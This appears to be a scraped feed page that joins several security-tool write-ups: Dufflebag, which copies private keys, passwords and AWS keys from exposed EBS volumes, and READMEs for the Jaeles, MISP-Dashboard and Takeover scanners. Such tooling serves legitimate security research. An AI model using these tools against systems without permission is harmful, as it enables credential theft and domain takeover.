One of the reasons Dufflebag is designed as an Elastic Beanstalk app is so that you can automatically scale the program up or down easily. By default, it'll just run on one instance and be pretty slow. But if you'd like to juice it up a little, adjust the autoscaling in Elastic Beanstalk. The full options of this are a little outside the scope of this document, so I'll let you play with them. But in practice, I've found that a simple CPU use trigger works pretty well.
When setting up the environment above, you'll find the options under the Configure more options button (instead of hitting Create environment) and then hit Scaling.


Getting The Stolen Goods
Dufflebag will copy out any interesting files out to the S3 bucket that you made earlier. (Technically, Dufflebag will use the first S3 bucket it finds who's name starts with "dufflebag".)
You can just watch the files come in one-by-one in your S3 bucket. They will be named:
originalfilename_blake3sum_volumeid

Checking on Status
If everything is going well, you shouldn't need to read the logs. But just in case, Elastic Beanstalk lets apps write to log files as they run, and these are captured by navigating to the Logs tab. Then hit Request Logs and Last 100 Lines. This will get you the most recent batch of Dufflebag logs. Hit the Download button to read it. This file will contain a bunch of other system logs, but the Dufflebag part is under "/var/log/web-1.log" at the top.
In order to see the full log history, select Full Logs instead of Last 100 Lines. (Note that EB will rotate logs away pretty aggressively by default)
Additionally, you can get a sense of overall progress by looking at the SQS queue for the environment. Elastic Beanstalk worker environments use SQS to manage the workflow. Each message in the queue for Dufflebag represents an EBS volume to process:


The Messages Available column shows how many volumes have not yet been processed. The Messages in Flight column shows how many volumes are being processed right now.

Tweaking what to Search For
Dufflebag is programmed to search for stuff we thought would be likely to be "interesting". Private keys, passwords, AWS keys, etc... But what if you really want to search for something specific to YOU? Like, maybe you work for bank.com and would like to see what's out there that references bank.com.
Doing so will require a minor amount of modification to the Dufflebag code, but not very much. Don't worry! The logic for what to search for happens in inspector.go. The pilfer() function is a goroutine that handles inspecting a file. The code there may look a little intimidating at first, but here's what it's doing. (And how you can modify that without much difficulty)
File name blacklists:
  1. Check the file name against a blacklist. (blacklist_exact)
  2. Check the file name against a "contains" blacklist. (Reject the file if it contains a given string) (blacklist_contains)
  3. Check the file name against a prefix blacklist. (Reject the file if it starts with a given string) (blacklist_prefix)
You can modify the searching logic here pretty easily by just changing what's in those three lists. Though I'd in general recommend leaving these in tact. These blacklists are designed to cover boring files that are present in a lot of filesystems and prevents Dufflebag from needing to inspect in-depth every single file on all of AWS. Sensitive data you're looking for MIGHT be in those files... but probably not.
File name whitelist:
  1. The IsSensitiveFileName() function checks the file name against a regular expression that finds sensitive file names. (Such as /etc/shadow, bash_history, etc...)
File contents:
  1. Check the file contents against a set of regular expressions.


Jaeles v0.4 - The Swiss Army Knife For Automated Web Application Testing

$
0
0

Jaeles is a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner.

Installation
Download precompiled version here.
If you have a Go environment, make sure you have Go >= 1.13 with Go Modules enable and run the following command.
GO111MODULE=on go get -u github.com/jaeles-project/jaeles
Please visit the Official Documention for more details.
Checkout Signature Repo for base signature and passive signature.

Usage
More usage here
Example commands.
jaeles scan -u http://example.com

jaeles scan -s signatures/common/phpdebug.yaml -U /tmp/list_of_urls.txt

jaeles scan -v --passive --verbose -s "signatures/cves/jira-*" -U /tmp/list_of_urls.txt -o /tmp/vuls

jaeles server --verbose -s sqli

Showcases
More showcase here


Detect Jira SSRF CVE-2019-8451

Burp Integration


Plugin can be found here and Video Guide here

Mentions
My introduction slide about Jaeles

Planned Features
  • Adding more signatures.
  • Adding more input sources.
  • Adding more APIs to get access to more properties of the request.
  • Adding proxy plugins to directly receive input from browser of http client.
  • Adding passive signature for passive checking each request.
  • Adding more action on Web UI.
  • Integrate with many other tools.

Credits


Misp-Dashboard - A Dashboard For A Real-Time Overview Of Threat Intelligence From MISP Instances

$
0
0

A dashboard showing live data and statistics from the ZMQ feeds of one or more MISP instances. The dashboard can be used as a real-time situational awareness tool to gather threat intelligence information. The misp-dashboard includes a gamification tool to show the contributions of each organisation and how they are ranked over time. The dashboard can be used for SOCs (Security Operation Centers), security teams or during cyber exercises to keep track of what is being processed on your various MISP instances.

Features

Live Dashboard
  • Possibility to subscribe to multiple ZMQ feeds from different MISP instances
  • Shows immediate contributions made by organisations
  • Displays live resolvable posted geo-locations


Geolocalisation Dashboard
  • Provides historical geolocalised information to support security teams, CSIRTs or SOCs in finding threats within their constituency
  • Possibility to get geospatial information from specific regions

Contributors Dashboard
Shows:
  • The monthly rank of all organisations
  • The last organisation that contributed (dynamic updates)
  • The contribution level of all organisations
  • Each category of contributions per organisation
  • The current ranking of the selected organisation (dynamic updates)
Includes:
  • Gamification of the platform:
    • Two different levels of ranking with unique icons
    • Exclusive obtainable badges for source code contributors and donator


Users Dashboard
  • Shows when and how the platform is used:
    • Login punchcard and contributions over time
    • Contribution vs login

Trendings Dashboard
  • Provides real time information to support security teams, CSIRTs or SOC showing current threats and activity
    • Shows most active events, categories and tags
    • Shows sightings and discussion overtime

Installation
Before installing, consider that the only supported system are open source Unix-like operating system such as Linux and others.
  • Launch ./install_dependencies.sh from the MISP-Dashboard directory (idempotent-ish)
  • Update the configuration file config.cfg so that it matches your system
    • Fields that you may change:
      • RedisGlobal -> host
      • RedisGlobal -> port
      • RedisGlobal -> zmq_url
      • RedisGlobal -> misp_web_url
      • RedisMap -> pathMaxMindDB

Updating by pulling
  • Re-launch ./install_dependencies.sh to fetch new required dependencies
  • Re-update your configuration file config.cfg by comparing eventual changes in config.cfg.default
Make sure no zmq python3 scripts are running. They block the update.
+ virtualenv -p python3 DASHENV
Already using interpreter /usr/bin/python3
Using base prefix '/usr'
New python executable in /home/steve/code/misp-dashboard/DASHENV/bin/python3
Traceback (most recent call last):
File "/usr/bin/virtualenv", line 9, in <module>
load_entry_point('virtualenv==15.0.1', 'console_scripts', 'virtualenv')()
File "/usr/lib/python3/dist-packages/virtualenv.py", line 719, in main
symlink=options.symlink)
File "/usr/lib/python3/dist-packages/virtualenv.py", line 942, in create_environment
site_packages=site_packages, clear=clear, symlink=symlink))
File "/usr/lib/python3/dist-packages/virtualenv.py", line 1261, in install_python
shutil.copyfile(executable, py_executable)
File "/usr/lib/python3.5/shutil.py", line 115, in copyfile
with open(dst, 'wb') as fdst:
OSError: [Errno 26] Text file busy: '/home/steve/code/misp-dashboard/DASHENV/bin/python3'
< /pre>
  • Restart the System: ./start_all.shOR./start_zmq.sh and ./server.py &

Starting the System
You should not run it as root. Normal privileges are fine.
  • Be sure to have a running redis server
    • e.g. redis-server --port 6250
  • Activate your virtualenv . ./DASHENV/bin/activate
  • Listen to the MISP feed by starting the zmq_subscriber ./zmq_subscriber.py &
  • Start the dispatcher to process received messages ./zmq_dispatcher.py &
  • Start the Flask server ./server.py &
  • Access the interface at http://localhost:8001/
Alternatively, you can run the start_all.sh script to run the commands described above.

Authentication
Authentication can be enable in config/config.cfg by setting auth_enabled = True. Users will be required to login to MISP and will be allowed to proceed if they have the User Setting's dashboard_access sets to 1 for the MISP user account.

Debug
Debug is fun and gives you more details on what is going on when things fail. Bare in mind running Flask in debug is NOT suitable for production, it will drop you to a Python shell if enabled, to do further digging.
Just before running ./server.py do:
export FLASK_DEBUG=1
export FLASK_APP=server.py
flask run --host=0.0.0.0 --port=8001 # <- Be careful here, this exposes it on ALL ip addresses. Ideally if run locally --host=127.0.0.1
OR, just toggle the debug flag in start_all.sh or config.cfg.
Happy hacking ;)

Restart from scratch
To restart from scratch and empty all data from your dashboard you can use the dedicated cleaning script clean.py
  Clean data stored in the redis server specified in the configuration file    optional arguments:    -h, --help    show this help message and exit    -b, --brutal  Perfom a FLUSHALL on the redis database. If not set, will use                  a soft method to delete only keys used by MISP-Dashboard.  

Notes about ZMQ
The misp-dashboard being stateless in regards to MISP, it can only process data that it received. Meaning that if your MISP is not publishing all notifications to its ZMQ, the misp-dashboard will not have them.
The most revelant example could be the user login punchcard. If your MISP doesn't have the option Plugin.ZeroMQ_audit_notifications_enable set to true, the punchcard will be empty.

Dashboard not showing results - No module named zmq
When the misp-dashboard does not show results then first check if the zmq module within MISP is properly installed.
In Administration, Plugin Settings, ZeroMQ check that Plugin.ZeroMQ_enable is set to True.
Publish a test event from MISP to ZMQ via Event Actions, Publish event to ZMQ.
Verify the logfiles

Clean data stored in the redis server specified in the configuration file

optional arguments:
-h, --help show this help message and exit
-b, --brutal Perfom a FLUSHALL on the redis database. If not set, will use
a soft method to delete only keys used by MISP-Dashboard.
If there's an error ModuleNotFoundError: No module named 'zmq' then install pyzmq.
${PATH_TO_MISP}/app/tmp/log/mispzmq.error.log
${PATH_TO_MISP}/app/tmp/log/mispzmq.log

zmq_subscriber options
  A zmq subscriber. It subscribe to a ZMQ then redispatch it to the MISP-dashboard    optional arguments:    -h, --help            show this help message and exit    -n ZMQNAME, --name ZMQNAME                          The ZMQ feed name    -u ZMQURL, --url ZMQURL                          The URL to connect to  

Deploy in production using mod_wsgi
Install Apache mod-wsgi for Python3
$SUDO_WWW ${PATH_TO_MISP}/venv/bin/pip install pyzmq
Caveat: If you already have mod-wsgi installed for Python2, it will be replaced!

A zmq subscriber. It subscribe to a ZMQ then redispatch it to the MISP-dashboard

optional arguments:
-h, --help show this help message and exit
-n ZMQNAME, --name ZMQNAME
The ZMQ feed name
-u ZMQURL, --url ZMQURL
The URL to connect to
Configuration file /etc/apache2/sites-available/misp-dashboard.conf assumes that misp-dashboard is cloned into /var/www/misp-dashboard. It runs as user misp in this example. Change the permissions to your custom folder and files accordingly.
sudo apt-get install libapache2-mod-wsgi-py3


Takeover v0.2 - Sub-Domain TakeOver Vulnerability Scanner

$
0
0

Sub-domain takeovervulnerability occur when a sub-domain (subdomain.example.com) is pointing to a service (e.g: GitHub, AWS/S3,..) that has been removed or deleted. This allows an attacker to set up a page on the service that was being used and point their page to that sub-domain. For example, if subdomain.example.com was pointing to a GitHub page and the user decided to delete their GitHub page, an attacker can now create a GitHub page, add a CNAME file containing subdomain.example.com, and claim subdomain.example.com. For more information: here

Supported Services
'AWS/S3'
'BitBucket'
'CloudFront'
'Github'
'Shopify'
'Desk'
'Fastly'
'FeedPress'
'Ghost'
'Heroku'
'Pantheon'
'Tumbler'
'Wordpress'
'Desk'
'ZenDesk'
'TeamWork'
'Helpjuice'
'Helpscout'
'S3Bucket'
'Cargo'
'StatuPage'
'Uservoice'
'Surge'
'Intercom'
'Webflow'
'Kajabi'
'Thinkific'
'Tave'
'Wishpond'
'Aftership'
'Aha'
'Tictail'
'Brightcove'
'Bigcartel'
'ActiveCampaign'
'Campaignmonitor'
'Acquia'
'Proposify'
'Simplebooklet'
'GetResponse'
'Vend'
'Jetbrains'
'Unbounce'
'Tictail'
'Smartling'
'Pingdom'
'Tilda'
'Surveygizmo'
'Mashery'

Installation:
git clone https://github.com/m4ll0k/takeover.git
cd takeover
python3 takeover.py
or:
wget -q https://raw.githubusercontent.com/m4ll0k/takeover/master/takeover.py && python3 takeover.py
or:
pip3 install https://github.com/m4ll0k/takeover.git

Usage
$ python3 takeover.py -d www.domain.com -v 
$ python3 takeover.py -d www.domain.com -v -t 30
$ python3 takeover.py -d www.domain.com -p http://127.0.0.1:8080 -v
$ python3 takeover.py -d www.domain.com -o <output.txt> or <output.json> -v
$ python3 takeover.py -l uber-sub-domains.txt -o output.txt -p http://xxx.xxx.xxx.xxx:8080 -v
$ python3 takeover.py -d uber-sub-domains.txt -o output.txt -T 3 -v


Viewing all 5854 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>